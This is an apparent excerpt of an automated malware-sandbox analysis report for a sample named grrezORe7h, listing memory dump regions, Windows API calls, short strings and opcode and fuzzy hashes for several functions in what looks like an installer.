                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                      • String ID: nsa
                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                      • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                      • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                      • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                      • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                      • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                      Strings
                                                                                                                      • Error launching installer, xrefs: 00405748
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                      • String ID: Error launching installer
                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                      • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                      • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                      • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                      • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xhq$Xhq$Xhq$Xhq
                                                                                                                      • API String ID: 0-3565632849
                                                                                                                      • Opcode ID: bd4ba88cc248bfb55c77f74d89d57dab71871d1dff15f5daaa02f792f975ee94
                                                                                                                      • Instruction ID: 5822f02ea1f7039511748086ab8995d699389fe80dd727c0ba828b42a5e6aa0f
                                                                                                                      • Opcode Fuzzy Hash: bd4ba88cc248bfb55c77f74d89d57dab71871d1dff15f5daaa02f792f975ee94
                                                                                                                      • Instruction Fuzzy Hash: 4C318675D0031DDFDF668BA988503BEB7F2AF95311F1440A5CC69AB240EB708D89CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \;dq$\;dq$\;dq$\;dq
                                                                                                                      • API String ID: 0-1855092343
                                                                                                                      • Opcode ID: 7bac71976ef34cbff805724e0cf39c3cefa17d7c7b34e8cd999277627c121d19
                                                                                                                      • Instruction ID: a0bdc892e56e500aca1ee42bf58c1d73d31da2d98d58ea9206cf9b0a4e3dbd50
                                                                                                                      • Opcode Fuzzy Hash: 7bac71976ef34cbff805724e0cf39c3cefa17d7c7b34e8cd999277627c121d19
                                                                                                                      • Instruction Fuzzy Hash: 1F018431710925CFCB248E2DC460A2677E7AF987BA7264169EC29CF3B0DB35DC458791
                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190613189-0
                                                                                                                      • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                      • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                      • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                      • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9